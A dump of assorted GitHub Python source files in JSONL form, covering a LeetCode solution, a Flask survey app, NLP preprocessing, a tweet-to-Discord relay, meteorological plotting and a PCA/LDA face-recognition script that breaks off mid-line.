+{"seq_id":"4586941478","text":"#205. Isomorphic Strings\nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n s_to_t = {}\n t_to_s = {}\n\n for i in range(len(s)):\n \n if s[i] not in s_to_t:\n s_to_t[s[i]] = []\n \n if t[i] not in t_to_s:\n t_to_s[t[i]] = []\n\n if t[i] not in s_to_t[s[i]]:\n s_to_t[s[i]].append(t[i])\n\n if s[i] not in t_to_s[t[i]]:\n t_to_s[t[i]].append(s[i])\n \n if len(t_to_s[t[i]]) > 1 or len(s_to_t[s[i]]) > 1:\n return False \n \n if t_to_s[s_to_t[s[i]][0]][0] != s[i]:\n return False\n\n \n\n \n return True\n","repo_name":"SpinachXPasta/Leetcode","sub_path":"isIsomorphic.py","file_name":"isIsomorphic.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5762353213","text":"from __future__ import print_function\nimport sys\nimport argparse\nimport os.path\nfrom check_file import check_file\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--vcf-file', required=True, help='')\n parser.add_argument('-o', '--output-file', nargs='?', help='')\n parser.add_argument('-s', '--stdout', action='store_true', help='')\n args = parser.parse_args()\n\n check_file(args.vcf_file)\n\n if not args.stdout and not args.output_file:\n args.output_file = args.vcf_file + '.noh'\n\n return(args.vcf_file, args.output_file)\n\n\ndef remove_header(input_file, output_file=None):\n if not output_file:\n of = sys.stdout\n else:\n of = open(output_file, 'w')\n\n with open(input_file, 'r') as f:\n for line in f:\n if not line.startswith('##'):\n print(line, file=of, end='')\n\n\ndef main():\n input_file, output_file = get_args()\n remove_header(input_file, output_file)\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewquitadamo/matrix_eqtl_pipeline","sub_path":"code/remove_vcf_header.py","file_name":"remove_vcf_header.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"39775377545","text":"from flask import Flask, render_template, redirect, flash\nfrom flask.globals import request\nfrom flask_debugtoolbar import DebugToolbarExtension\n\nfrom Surveys import Question as Q, Survey as S, satisfaction_survey as ss, personality_quiz as pq, surveys\nfrom QuestionForm import QuestionForm as QF\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"himitsu-desu\"\n\ndebug = DebugToolbarExtension(app)\n\n\nresponses = []\n\n\n@app.route('/')\ndef start_survey():\n \"\"\"Return start survey page.\"\"\"\n \n title = ss.title\n instructions = ss.instructions\n \n return render_template(\"start.html\", instructions = instructions, title = title)\n\n\n@app.route('/question/')\ndef question(id):\n \"\"\"Return question page.\"\"\"\n form = QF()\n\n current_id = len(responses)\n \n if id == current_id:\n title = ss.title\n question = ss.questions[current_id].question\n choices = ss.questions[current_id].choices\n instructions = ss.instructions\n return render_template(\"question.html\", question = question, title = title, id = current_id, form = form, instructions = instructions, choices = choices)\n elif id > len(ss.questions) and len(responses) >= len(ss.questions):\n return redirect('/thanks')\n else: \n flash(\"Invalid question, try again!\", 'warn')\n return redirect(f'/question/{current_id}')\n\n\n@app.route('/answer', methods=['POST'])\ndef handle_answer():\n \"\"\"Handle answer from form submission and redirect.\"\"\"\n \n answer = request.form['choices']\n responses.append(answer)\n current_id = len(responses)\n \n if len(responses) < len(ss.questions):\n return redirect(f'/question/{current_id}')\n else:\n return redirect('/thanks')\n \n \n@app.route('/thanks')\ndef thanks():\n \"\"\"Return thank you page.\"\"\"\n \n return render_template(\"thanks.html\")","repo_name":"Katsurio/FlaskSurvey","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1327121465","text":"import re\nimport pandas as pd\nimport nltk\nnltk.download('brown')\nnltk.download('names')\nnltk.download('universal_tagset')\nnltk.download('average_perceptron_tagger')\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom nltk.tokenize import word_tokenize, regexp_tokenize\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom nltk.corpus import stopwords\nfrom textblob import TextBlob\nimport string\nfrom collections import Counter\nfrom normalise import normalise\n\nfrom sklearn.base import TransformerMixin, BaseEstimator\n\nclass TextSlack(BaseEstimator, TransformerMixin):\n def __init__(self, variety='BrE', user_abbrevs={}, lang='english'):\n try:\n self.variety = variety\n self.user_abbrevs = user_abbrevs\n self.lang = lang\n if self.lang in stopwords.fileids() and self.lang in SnowballStemmer.languages:\n self.stop_words = stopwords.words(lang)\n else:\n raise LanguageNotFoundException('{} is currently not supported by textslack.'.format(self.lang), 'Keep checking for support in the future updates.')\n self.lemmatizer = WordNetLemmatizer()\n self.stemmer = SnowballStemmer(lang, ignore_stopwords=True)\n \n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def fit(self, X, y=None):\n return self\n\n def transform(self, X, *_):\n if isinstance(X, pd.Series):\n return X.apply(self._preprocess_text)\n elif isinstance(X, list):\n return [self._preprocess_text(x) for x in X]\n else:\n return self._preprocess_text(X)\n\n def _preprocess_text(self, text):\n if self.lang == 'english':\n normalised_text = self._normalise(text)\n normalised_text = re.sub(' +', ' ', normalised_text)\n words = regexp_tokenize(normalised_text.lower(), r'[A-Za-z]+')\n removed_punct = self._remove_punct(words)\n removed_stopwords = self._remove_stopwords(removed_punct)\n return self._lemmatize(removed_stopwords)\n else:\n words = word_tokenize(text.lower())\n removed_punct = self._remove_punct(words)\n removed_stopwords = self._remove_stopwords(removed_punct)\n return ' '.join([w for w in removed_stopwords])\n\n def _normalise(self, text):\n try:\n return ' '.join(normalise(word_tokenize(text), variety=self.variety, user_abbrevs=self.user_abbrevs, verbose=False))\n except:\n return text\n\n def _remove_punct(self, words):\n return [w for w in words if w not in string.punctuation]\n\n def _remove_stopwords(self, words):\n return [w for w in words if w not in self.stop_words and len(w)>1]\n\n def _lemmatize(self, words):\n return ' '.join([self.lemmatizer.lemmatize(w, pos='v') for w in words])\n \n def _stem(self, words):\n return ' '.join([self.stemmer.stem(w) for w in words])\n \n def extract_nouns(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'NN'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def extract_verbs(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'VB'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep 
checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def extract_adjectives(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'JJ'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def extract_adverbs(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n pos_tags, _ = self._blob_features(processed_text)\n return ' '.join([w for w, p in pos_tags if p == 'RB'])\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n \n def sentiment(self, text):\n try:\n if self.lang == 'english':\n processed_text = self._preprocess_text(text)\n _, polarity = self._blob_features(processed_text)\n return 'pos' if polarity > 0.0 else 'neg' if polarity < 0.0 else 'neu'\n else:\n raise LanguageNotFoundException('Sorry for the inconvenience, textslack is still learning {}.'.format(self.lang), 'Keep checking for support in the future updates.')\n except LanguageNotFoundException as e:\n print(str(e))\n print('Details: {}'.format(e.details))\n\n def _blob_features(self, text):\n blob = TextBlob(text)\n return blob.tags, blob.polarity\n \n def word_occurances(self, word, text):\n word_count_dic = dict(Counter([w for w in word_tokenize(text)]))\n return [c for w, c in word_count_dic.items() if w==word][0]\n \nclass LanguageNotFoundException(Exception):\n def __init__(self, message, details=None):\n self.message = message\n self.details = details\n def __str__(self):\n return str(self.message)","repo_name":"AnkitRajSri/textslack","sub_path":"textslack/textslack.py","file_name":"textslack.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"15362250181","text":"\"\"\"Add ticket_issued payment flag\n\nRevision ID: 17032733727a\nRevises: 3c6cca2d97e3\nCreate Date: 2019-11-05 16:07:14.444915\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '17032733727a'\ndown_revision = '3c6cca2d97e3'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('purchase', sa.Column('ticket_issued', sa.Boolean(), nullable=False, server_default='false'))\n op.add_column('purchase_version', sa.Column('ticket_issued', sa.Boolean(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('purchase_version', 'ticket_issued')\n op.drop_column('purchase', 'ticket_issued')\n # ### end Alembic commands ###\n","repo_name":"emfcamp/Website","sub_path":"migrations/versions/17032733727a_add_ticket_issued_purchase_flag.py","file_name":"17032733727a_add_ticket_issued_purchase_flag.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"71"}
+{"seq_id":"12108466707","text":"\"\"\"Pig Latin, by Al Sweigart al@inventwithpython.com\nTranslates English messages into Igpay Atinlay.\nView this code at https://nostarch.com/big-book-small-python-projects\nTags: short, word\"\"\"\n\ntry:\n import pyperclip\nexcept ImportError:\n pass\n\nVOWELS = ('a', 'e', 'i', 'o', 'u', 'y')\n\ndef main():\n print('Enter your message:')\n pigLatin = englishToPigLatin(input('> '))\n\n print(pigLatin)\n\ndef englishToPigLatin(message):\n pigLatin = ''\n for word in message.split():\n prefixNonLetters = ''\n while len(word) > 0 and not word[0].isalpha():\n prefixNonLetters += word[0]\n word = word[1:]\n \n if len(word) == 0:\n pigLatin = pigLatin + prefixNonLetters + ' '\n continue\n\n suffixNonLetters = ''\n while not word[-1].isalpha():\n suffixNonLetters = word[-1] + suffixNonLetters\n word = word[:-1]\n \n wasUpper = word.isupper()\n wasTitle = word.istitle()\n\n word = word.lower()\n\n prefixConsonants = ''\n while len(word) > 0 and not word[0] in VOWELS:\n prefixConsonants += word[0]\n word = word[1:]\n \n if prefixConsonants != '':\n word += prefixConsonants + 'ay'\n else:\n word += 'yay'\n \n if wasUpper:\n word = word.upper()\n if wasTitle:\n word = word.title()\n \n pigLatin += prefixNonLetters + word + suffixNonLetters + ' '\n return pigLatin\n\nif __name__ == '__main__':\n main()","repo_name":"therealskv/python-small-projects","sub_path":"piglatin.py","file_name":"piglatin.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"26968876662","text":"import argparse\nimport functools\nimport operator\nimport pathlib\nfrom typing import Dict\n\nimport pandas as pd\nfrom bokeh.plotting import save\nfrom robotoff.taxonomy import Taxonomy\nfrom robotoff.utils import gzip_jsonl_iter\nfrom tensorflow import keras\n\nimport settings\nfrom category_classification.data_utils import generate_data_from_df\nfrom utils.error_analysis import (\n generate_analysis_model,\n get_deepest_categories,\n get_error_category,\n get_interactive_embedding_plot,\n)\nfrom utils.io import (\n load_category_vocabulary,\n load_config,\n load_ingredient_vocabulary,\n load_product_name_vocabulary,\n)\nfrom utils.metrics import evaluation_report\nfrom utils.preprocess import get_nlp\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"model_path\",\n type=pathlib.Path,\n default=pathlib.Path(__file__).parent / \"weights/0/saved_model\",\n )\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n model_dir = args.model_path.parent\n\n config = load_config(model_dir)\n\n category_to_id = load_category_vocabulary(model_dir)\n ingredient_to_id = load_ingredient_vocabulary(model_dir)\n category_names = [\n category\n for category, _ in sorted(category_to_id.items(), key=operator.itemgetter(1))\n ]\n\n nlp = get_nlp(config.lang)\n\n product_name_vocabulary = load_product_name_vocabulary(model_dir)\n model = keras.models.load_model(str(args.model_path))\n\n generate_data_partial = functools.partial(\n generate_data_from_df,\n ingredient_to_id=ingredient_to_id,\n category_to_id=category_to_id,\n product_name_max_length=config.model_config.product_name_max_length,\n product_name_token_to_int=product_name_vocabulary,\n nlp=nlp,\n product_name_preprocessing_config=config.product_name_preprocessing_config,\n nutriment_input=config.model_config.nutriment_input,\n )\n\n val_df = pd.DataFrame(gzip_jsonl_iter(settings.CATEGORY_XX_TEST_PATH))\n\n category_taxonomy: Taxonomy = Taxonomy.from_json(settings.CATEGORY_TAXONOMY_PATH)\n\n X_val, y_val = generate_data_partial(val_df)\n\n y_pred_val = model.predict(X_val)\n\n predicted = [\n [{category_names[i]: conf} for i, conf in sorted(enumerate(y)) if conf >= 0.5]\n for y in y_pred_val\n ]\n\n val_df[\"predicted categories\"] = [\n [p for p in preds if next(iter(p)) in categories]\n for preds, categories in zip(predicted, val_df.categories_tags)\n ]\n\n val_df[\"wrong prediction\"] = [\n [p for p in preds if next(iter(p)) not in categories]\n for preds, categories in zip(predicted, val_df.categories_tags)\n ]\n\n val_df[\"missed prediction\"] = [\n [\n category\n for category in categories\n if category not in [next(iter(d)) for d in preds]\n ]\n for preds, categories in zip(predicted, val_df.categories_tags)\n ]\n\n val_df = val_df[\n (val_df[\"wrong prediction\"].map(len) > 0)\n | (val_df[\"missed prediction\"].map(len) > 0)\n ]\n\n val_df.drop(\n [\n \"nutriments\",\n \"images\",\n \"product_name\",\n \"lang\",\n \"categories_tags\",\n \"ingredient_tags\",\n \"ingredients_text\",\n \"known_ingredient_tags\",\n ],\n axis=1,\n inplace=True,\n )\n\n val_df.rename(columns={\"code\": \"barcode\"}, inplace=True)\n\n pd.set_option(\"display.max_columns\", None)\n pd.set_option(\"display.max_rows\", None)\n pd.set_option(\"display.width\", None)\n pd.set_option(\"display.max_colwidth\", None)\n\n val_df.head(n=100).to_csv(\"misprediction_sample.csv\")\n\n #\n # report_val, clf_report_val = evaluation_report(y_val, y_pred_val,\n # taxonomy=category_taxonomy,\n # 
category_names=category_names)\n #\n #\n # def low_perf_categories_gen(clf_report: Dict,\n # min_support: int,\n # max_f1_score: float):\n # for category, metrics in clf_report.items():\n # f1_score = metrics['f1-score']\n # support = metrics['support']\n #\n # if support >= min_support:\n # if f1_score < max_f1_score:\n # yield category\n #\n # # train_df = pd.DataFrame(gzip_jsonl_iter(settings.CATEGORY_FR_TRAIN_PATH))\n # # train_df['deepest_categories'] = get_deepest_categories(category_taxonomy, train_df.categories_tags)\n # # X_train, y_train = generate_data_partial(train_df)\n #\n #\n # gen = low_perf_categories_gen(clf_report_val, min_support=10, max_f1_score=0.5)\n # cat = next(gen)\n # val_metrics = clf_report_val[cat]\n # cat_id = category_to_id[cat]\n # # train_samples_idx = y_train[:, cat_id].nonzero()[0]\n # val_samples_idx = y_val[:, cat_id].nonzero()[0]\n # # train_samples = train_df.iloc[train_samples_idx, :]\n # val_samples = val_df.iloc[val_samples_idx, :]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"openfoodfacts/off-category-classification","sub_path":"attic/category_classification/sample_generator.py","file_name":"sample_generator.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"}
+{"seq_id":"20717680","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pds\nfrom util.prefix import all\n\ndef main():\n\n df = pds.read_csv('word/properties/medicine.csv')\n\n pro = open('data/ontology/pro.ttl', 'w')\n pro.write(all())\n\n pro.write('\\n\\n\\n')\n\n for index, row in df.iterrows():\n pro.write('prom:P%d rdfs:label \"%s\"@cn .\\n' % (index, row['name']))\n\n pro.close()\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"hetaov/spider","sub_path":"ontology/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9242484216","text":"import tweepy, discord, time, requests \nfrom discord import Webhook, RequestsWebhookAdapter\n\n#auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth=tweepy.OAuthHandler(\"\", \"\");\n#auth.set_access_token(access_token, access_token_secret)\nauth.set_access_token(\"\", \"\");\napi = tweepy.API(auth);\n#get the discord webhook URL from creating a webhook in the prefered channel in your discord server\ndiscordWebhookURL = \"\";\n\n#Create a StreamListener.\nclass MyStreamListener(tweepy.StreamListener):\n def __init__(self, api):\n self.api = api;\n self.me = api.me();\n def process_data(self, status):\n print(status.text);\n def on_status(self, tweet):\n photos = []\n #Handle media.\n if 'media' in tweet.entities:\n for image in tweet.entities['media']:\n photos.append(image['media_url']);\n print(\"adding image to photos\");\n #Create webhook on discord server and include URL here.\n webhook = Webhook.from_url(discordWebhookURL, adapter=RequestsWebhookAdapter());\n print(len(photos))\n if len(photos) < 1:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text}\");\n if len(photos) == 1:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]}\");\n if len(photos) == 2:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]} {photos[1]}\");\n if len(photos) == 3:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]} {photos[1]} {photos[2]}\");\n if len(photos) == 4:\n webhook.send(f\"{tweet.user.name} tweeted : {tweet.text} {photos[0]} {photos[1]} {photos[2]} {photos[3]}\");\n def on_exception(self, exception):\n time.sleep(60);\n print('Took a minute break.');\n #Re-establish stream params in order to check if the stream is not running\n api = tweepy.API(auth);\n myStreamListener = MyStreamListener(api);\n stream = tweepy.Stream(api.auth, myStreamListener);\n if not stream.running:\n main();\n else:\n print('Failed to continue.');\ndef main():\n #Create a Stream\n api = tweepy.API(auth);\n myStreamListener = MyStreamListener(api);\n stream = tweepy.Stream(api.auth, myStreamListener);\n #Update this list of Twitter Ids (string) to follow. \n #Can find Twitter Id at https://codeofaninja.com/tools/find-twitter-id/\n stream.filter(follow=['']);\n#Continuously look out for Twitter events\nif __name__ == \"__main__\":\n while True:\n main()","repo_name":"TinyArcade/python-to-discordwebhooks","sub_path":"TweetToDiscord.py","file_name":"TweetToDiscord.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"32919062508","text":"import metview as mv\n\n# Note: at least Metview version 5.16.0 is required\n\n# getting data\nuse_mars = False\n\nfilename = \"vert_hovm_ml_tq.grib\"\nsteps = list(range(0, 132, 12))\n\n# getting forecast data from MARS\nif use_mars:\n ret_core = {\n \"date\": 20171016,\n \"time\": 0,\n \"levtype\": \"ml\",\n \"grid\": [1, 1],\n \"area\": [45, -10, 55, 5],\n }\n\n tq = mv.retrieve(\n type=\"fc\",\n param=[\"t\", \"q\"],\n step=steps,\n levelist=list(range(80, 138)),\n **ret_core\n )\n lnsp = mv.retrieve(type=\"fc\", param=\"lnsp\", step=steps, levelist=1, **ret_core)\n zs = mv.retrieve(type=\"an\", param=\"z\", levelist=1, **ret_core)\n g = mv.merge(tq, lnsp, zs)\n# read data from file\nelse:\n if mv.exist(filename):\n g = mv.read(filename)\n else:\n g = mv.gallery.load_dataset(filename)\n\n# extract surface geopotential\nzs = g.select(shortName=\"z\")\n\n# compute geopotential on model levels\nz = mv.Fieldset()\nfor step in steps:\n t = g.select(shortName=\"t\", step=step)\n q = g.select(shortName=\"q\", step=step)\n lnsp = g.select(shortName=\"lnsp\", step=step)\n z.append(mv.mvl_geopotential_on_ml(t, q, lnsp, zs))\n\n# scale geopotential to height above sea level\nz = z / 9.81\n\n# scale temperature from K to C\nt = g.select(shortName=\"t\") - 273.16\n\n# create input fieldset for vertical Hovmoeller\ng_hov = mv.merge(t, z)\n\n# define time axis\ntime_axis = mv.maxis(\n axis_type=\"date\",\n axis_tick_label_height=0.4,\n axis_date_type=\"hours\",\n axis_days_label_height=0.4,\n)\n\n# define vertical axis\nvertical_axis = mv.maxis(\n axis_type=\"position_list\",\n axis_tick_position_list=list(range(0, 4500, 500)),\n axis_tick_label_height=0.4,\n axis_title_text=\"Height ASL (m)\",\n axis_title_height=0.5,\n)\n\n# define vertical Hovmoeller with height above sea level axis for model level\n# data for a given location (at least Metview version 5.16.0 is required)\nhov = mv.mhovmoellerview(\n type=\"vertical_hovm\",\n input_mode=\"nearest_gridpoint\",\n point=[48, 2],\n vertical_level_type=\"user\",\n top_level=4000,\n bottom_level=0,\n vertical_coordinate_param=129,\n vertical_coordinate_extrapolate=\"off\",\n time_axis=time_axis,\n vertical_axis=vertical_axis,\n)\n\n# define contour shading\nt_shade = mv.mcont(\n contour_automatic_setting=\"style_name\",\n contour_style_name=\"sh_all_fM50t58i2\",\n legend=\"on\",\n)\n\n# define legend\nlegend = mv.mlegend(legend_text_font_size=0.3, legend_text_colour=\"charcoal\")\n\n# define the output plot file\nmv.setoutput(mv.pdf_output(output_name=\"vert_hovm_ml_in_height\"))\n\n# generate plot\nmv.plot(hov, g_hov, t_shade, legend)\n","repo_name":"ecmwf/metview-docs","sub_path":"docs/gallery/vert_hovm_ml_in_height.py","file_name":"vert_hovm_ml_in_height.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"}
+{"seq_id":"34193952947","text":"import numpy as np\nimport scipy.io\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom scipy import spatial\nfrom sklearn.preprocessing import normalize\nfrom sklearn.cluster import k_means\n\nfrom ex1a import count_non_zero\nfrom in_out import display_eigenvectors, save_values\n\n\nINPUT_PATH = 'data/face.mat'\nTRAINING_SPLIT_PERCENT = 0.7\nTRAINING_SPLIT = int(TRAINING_SPLIT_PERCENT*10)\nNUMBER_PEOPLE = 52\nM_PCA_reduction = 0 # Negative value\nM_LDA_reduction = 0 # Negative value\n\n# Leave those alone, access only\nM_PCA = 0\nM_LDA = 0\nSB_RANK = 0\nSW_RANK = 0\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n # print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n # print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n\n plt.yticks(tick_marks, classes)\n plt.xticks(tick_marks[0::5], classes[0::5], rotation=0)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n # for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n # plt.text(j, i, format(cm[i, j], fmt),\n # horizontalalignment=\"center\",\n # color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n plt.show()\n\ndef import_processing(data, class_means=False):\n\n faces = loadmat(data)\n # faces dimension is 2576, 520 -> each image is column vector of pixels(46, 56)\n X = np.reshape(faces['X'], (46*56, 52, 10)) # separate arrays for each person\n X = split_data(X)\n means = np.mean(X[0], axis=1, keepdims=True)\n # data = [(x - means[0][..., None]) for i, x in enumerate(X)]\n return X, means\n\n\ndef split_data(x):\n random_indexes = np.arange(0, 10)\n np.random.shuffle(random_indexes)\n\n training_data = np.reshape(x[..., random_indexes[0:TRAINING_SPLIT]], (46*56, -1))\n test_data = np.reshape(x[..., random_indexes[TRAINING_SPLIT:]], (46*56, -1))\n\n data = [training_data, test_data]\n return data\n\ndef compute_S(data, low_res=False):\n\n N = data.shape[1]\n if low_res:\n data = data.transpose()\n S = np.matmul(data, data.transpose()) / N # Normalises by N\n\n return S\n\ndef find_eigenvectors(S, how_many=-1):\n\n if how_many is -1:\n how_many = S.shape[0]\n\n eigvalues, eigvectors = np.linalg.eig(S)\n indices = np.flip(np.argsort(eigvalues), axis=0) # Gives original indices after sorting\n sorted_eigvalues = eigvalues[indices]\n sorted_eigvectors = eigvectors[:, indices]\n\n return sorted_eigvalues[0:how_many], sorted_eigvectors[:, 0:how_many]\n\ndef retrieve_low_eigvecs(low_eigvecs, data): # Returns normalized eigenvectors\n\n vecs = np.matmul(data, low_eigvecs)\n vecs /= np.linalg.norm(vecs, axis=0)[None, :]\n return vecs\n\n\ndef find_projection(eigenvectors, faces): # eigenvectors and faces in vector form\n\n coeffs = np.matmul(faces.transpose(), eigenvectors).transpose()\n # number_of_eigenvectors X Faces\n return coeffs\n\n\ndef reduce_by_PCA(training_data, means):\n global M_PCA\n\n training_data_norm = training_data - means\n low_S = compute_S(training_data_norm, low_res=True)\n eig_val, eig_vec = find_eigenvectors(low_S, 
how_many=-1)\n eig_vec = retrieve_low_eigvecs(eig_vec, training_data_norm)\n M_PCA = training_data_norm.shape[1]-NUMBER_PEOPLE + M_PCA_reduction # hyperparameter Mpca <= N-c\n eig_vec_reduced = eig_vec[:, :M_PCA]\n return eig_vec_reduced\n\n\ndef compute_class_means(training_data):\n\n class_means = np.mean(training_data.reshape(-1, NUMBER_PEOPLE, TRAINING_SPLIT), axis=2) # Shape is 2576*52 -> D*c\n return class_means\n\n\ndef compute_class_scatters(training_data, class_means):\n\n class_means_expand = np.repeat(class_means, TRAINING_SPLIT, axis=1)\n class_means_expand = class_means_expand.reshape(-1, NUMBER_PEOPLE, TRAINING_SPLIT).transpose(1, 0, 2)\n training_data_resh = training_data.reshape(-1, NUMBER_PEOPLE, TRAINING_SPLIT).transpose(1, 0, 2)\n class_scatters = np.matmul(training_data_resh - class_means_expand, (training_data_resh - class_means_expand).transpose(0, 2, 1))\n # Might have to for loop but I think it works\n return class_scatters\n\ndef compute_Sb(class_means):\n\n global_mean = np.mean(class_means, axis=1, keepdims=True)\n global_mean = np.repeat(global_mean, NUMBER_PEOPLE, axis=1)\n Sb = np.matmul(class_means - global_mean, (class_means - global_mean).transpose())\n return Sb\n\ndef compute_Sw(class_scatters):\n\n Sw = np.sum(class_scatters, axis=0)\n return Sw\n\n\ndef compute_LDA_Fisherfaces(Sw, Sb, Wpca, faces):\n global M_LDA\n\n # Maybe remove mean from faces\n Sw_PCA = np.matmul(np.matmul(Wpca.transpose(), Sw), Wpca)\n Sb_PCA = np.matmul(np.matmul(Wpca.transpose(), Sb), Wpca)\n S = np.matmul(np.linalg.inv(Sw_PCA), Sb_PCA)\n eig_vals, fisherfaces = find_eigenvectors(S, how_many=-1)\n M_LDA = count_non_zero(eig_vals) + M_LDA_reduction # hyperparameter Mlda <= c-1 -> there should be 51 non_zero eiganvalues\n # print(M_LDA) # Mlda = c - 1 = 51\n fisherfaces_reduced = fisherfaces[:, :M_LDA]\n faces_PCA = find_projection(Wpca, faces)\n fisher_ref_coeffs = find_projection(fisherfaces_reduced, faces_PCA)\n return fisher_ref_coeffs, fisherfaces_reduced\n\n\ndef goto_original_domain(fisherfaces, Wpca):\n\n fisher_images = np.matmul(Wpca, fisherfaces)\n return fisher_images\n\n\ndef find_fisher_coeffs(candidate_images, Wpca, fisherfaces):\n\n PCA_images = find_projection(Wpca, candidate_images)\n LDA_coeffs = find_projection(fisherfaces, PCA_images) # 51 vector\n\n return LDA_coeffs\n\n\ndef classify(LDA_coeffs_training, LDA_coeffs_test):\n\n distances = []\n for i in range(LDA_coeffs_test.shape[1]):\n distances.append(np.linalg.norm(LDA_coeffs_training - LDA_coeffs_test[:, i][:, None], axis=0))\n\n return np.floor(np.argmin(np.array(distances), axis=1)/TRAINING_SPLIT).astype(np.uint16)\n\n\ndef create_ground_truth():\n\n true_individual_index = np.arange(0, NUMBER_PEOPLE)\n true_individual_index = np.repeat(true_individual_index[:, None], 10-TRAINING_SPLIT, axis=1).reshape(-1)\n return true_individual_index\n\n\ndef bool_and_accuracy(ground_truth, prediction):\n\n correct = ground_truth == prediction\n accuracy = (correct[correct].shape[0]) / (ground_truth.shape[0])\n return correct, accuracy\n\n\ndef identify_failure(bool_a, number=-1):\n\n indices = np.argwhere(~bool_a)[:, 0] # Gives original indices after sorting\n\n return indices[:number]\n\n\ndef identify_success(bool_a, number=-1):\n\n indices = np.argwhere(bool_a)[:, 0] # Gives original indices after sorting\n\n return indices[:number]\n\n\nif __name__ == '__main__':\n\n M_PCAs = []\n accuracies = []\n DISPLAY = True\n # while M_PCA_reduction > -312:\n\n [training_data, testing_data], means = 
